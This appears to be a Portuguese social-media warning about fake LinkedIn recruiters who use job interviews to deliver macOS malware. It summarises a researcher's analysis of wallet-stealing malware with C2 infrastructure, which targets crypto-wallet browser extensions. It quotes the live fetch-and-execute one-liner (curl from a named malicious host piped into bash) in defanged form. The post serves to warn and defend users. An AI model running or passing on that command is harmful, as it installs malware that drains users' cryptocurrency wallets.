Tenha cuidado com entrevistas de emprego falsas. Elas agora são um dos vetores mais limpos de entrega de malware.


Meu irmão quase foi vítima esta semana.
O passo a passo do golpe:
> Um "recrutador" o contata pelo LinkedIn
> Eles realmente leram seu currículo. sabem sua stack. agendam uma entrevista de verdade.
> Algumas horas antes da ligação: "Você pode revisar nossa página de produto rapidinho antes de conversarmos?"
> Ao visitar o site, executa-se isto em segundo plano:
curl -s macos[.]hyperhives[.]net/install | nohup bash &
se você digitar sua senha quando solicitado, acabou.
Um pesquisador (Darksp33d no Github) reverse-engineerou o binário:
> toda string de configuração criptografada com 570 funções personalizadas únicas
> uma vez decodificada: servidor c2 completo, lista de endpoints, e um dsn de rastreamento de erros do sentry que se conecta ao desenvolvedor sob intimação legal
> 276 IDs de extensões do Chrome direcionadas, cobrindo 188 carteiras de criptomoedas
> sobreposição de ttp com a "entrevista contagiosa" da DPRK é forte
> 9/64 no virustotal. crowdstrike, sophos, malwarebytes, todos não detectaram
recrutadores de verdade, currículos reais, vagas de entrevista reais, site com aparência legítima. uma linha de curl drena suas carteiras.
se um "recrutador" algum dia pedir para você executar algo no seu terminal, mesmo algo inocente como um script de build antes de uma entrevista técnica, feche a aba.
Ver original
post-image
Esta página pode conter conteúdo de terceiros, que é fornecido apenas para fins informativos (não para representações/garantias) e não deve ser considerada como um endosso de suas opiniões pela Gate nem como aconselhamento financeiro ou profissional. Consulte a Isenção de responsabilidade para obter detalhes.
  • Recompensa
  • Comentário
  • Repostar
  • Compartilhar
Comentário
Adicionar um comentário
Adicionar um comentário
Sem comentários
  • Marcar